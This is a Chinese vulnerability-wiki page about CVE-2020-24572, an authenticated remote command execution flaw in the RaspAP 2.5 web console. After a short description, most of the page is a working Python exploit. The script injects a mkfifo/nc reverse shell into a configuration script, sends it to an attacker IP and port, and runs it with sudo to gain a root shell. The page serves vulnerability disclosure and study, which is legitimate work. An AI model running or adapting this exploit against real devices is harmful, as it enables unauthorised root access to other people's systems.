menu arrow_back 湛蓝安全空间 |狂野湛蓝,暴躁每天 chevron_right All_wiki chevron_right yougar0.github.io(基于零组公开漏洞库 + PeiQi文库的一些漏洞)-20210715 chevron_right Web安全 chevron_right RaspAP chevron_right (CVE-2020-24572)RaspAP 2.5 远程命令执行漏洞.md
  • home 首页
  • brightness_4 暗黑模式
  • cloud
    xLIYhHS7e34ez7Ma
    cloud
    湛蓝安全
    code
    Github
    (CVE-2020-24572)RaspAP 2.5 远程命令执行漏洞.md
    3.86 KB / 2021-04-21 09:23:46
        (CVE-2020-24572)RaspAP 2.5 远程命令执行漏洞
    =============================================
    
    一、漏洞简介
    ------------
    
    在RaspAP
    2.5的`include/webconsole.php`中发现了一个问题。借助经过身份验证的访问,攻击者可以使用配置错误(并且实际上不受限制)的Web控制台攻击运行该软件的底层OS(Raspberry
    Pi),并在系统上执行命令(包括用于上传文件和执行代码的命令)。
    
    二、漏洞影响
    ------------
    
    RaspAP 2.5
    
    三、复现过程
    ------------
    
    ### poc
    
    > CVE-2020-24572.py
    
    ![1.png](./resource/(CVE-2020-24572)RaspAP2.5远程命令执行漏洞/media/rId25.png)![2.png](./resource/(CVE-2020-24572)RaspAP2.5远程命令执行漏洞/media/rId26.png)
    
        #/usr/bin/python3
    
        #####################################################
        ##############       deadb0x.io        ##############
        #####################################################
        ###      Proof of Concept for CVE-2020-24572      ###
        ###     (Authenticated) Remote Code Execution     ###
        ###             via Webconsole.php in             ###
        ###                  RaspAP v2.5                  ###
        ###         github.com/billz/raspap-webgui        ###
        ###         github.com/nickola/web-console        ###
        #####################################################
        ### Written by: lunchb0x - Disc. Date: 08/24/2020 ###
        #####################################################
        ###       deadb0x.io/lunchb0x/CVE-2020-24572      ###
        ###         github.com/lb0x/CVE-2020-24572        ###
        #####################################################
    
        import os
        import sys
        import requests
        from termcolor import colored
    
        if len(sys.argv) != 6:
            print("---------------------------------------------------------------------------------------")
            print("USAGE: rasp_pwn.py [target_ip] [port] [attacker_ip] [attacker_port] [RaspAP_admin_pass]")
            print("---------------------------------------------------------------------------------------")
            exit(1)
    
        target = sys.argv[1]
        port = sys.argv[2]
        listener_ip = sys.argv[3]
        listener_port = sys.argv[4]
        raspap_user = "admin"
        raspap_pass = sys.argv[5]
    
        session = requests.Session()
        session.auth = (raspap_user, raspap_pass)
    
    
        json_req_1 = {
                      "jsonrpc":"2.0",
                      "method":"run",
                      "params":["NO_LOGIN",
                                {"user":"","hostname":"","path":""},
                                "echo 'touch \/tmp\/f;rm \/tmp\/f;mkfifo \/tmp\/f;cat \/tmp\/f|\/bin\/bash -i 2>&1|nc %s %d >\/tmp\/f' >> \/etc\/raspap\/lighttpd\/configport.sh"%(listener_ip, listener_port)
                                ],
                      "id":6
                      }
    
        json_req_2 = {
                      "jsonrpc":"2.0",
                      "method":"run",
                      "params":["NO_LOGIN",
                                {"user":"","hostname":"","path":""},
                                "sudo /etc/raspap/lighttpd/configport.sh"
                                ],
                      "id":6
                      }
    
        r = session.post("http://%s:%s/includes/webconsole.php"%(target,port), json=json_req_1)
        print(colored("[!]", 'green') + " Reverse shell injected")
        print(colored("[!]", 'yellow') + " Sending activation request - Make sure your listener is running . . .")
        os.system("stty -echo")
        input(colored("[>>>]", 'green')+" Press ENTER to continue . . .")
        os.system("stty echo")
        print(colored("\n[!]", 'green') + " You should be root :)")
    
        r = session.post("http://%s:%s/includes/webconsole.php"%(target,port), json=json_req_2)
        print(colored("[*]", 'green') + " Done.")
    
    
        print(colored("----------------", 'yellow'))
        print(colored("[] deadb0x.io", 'yellow'))
        print(colored("----------------", 'yellow'))
    
    参考链接
    --------
    
    > https://deadb0x.io/lunchb0x/cve-2020-24572/
    
    
    links
    file_download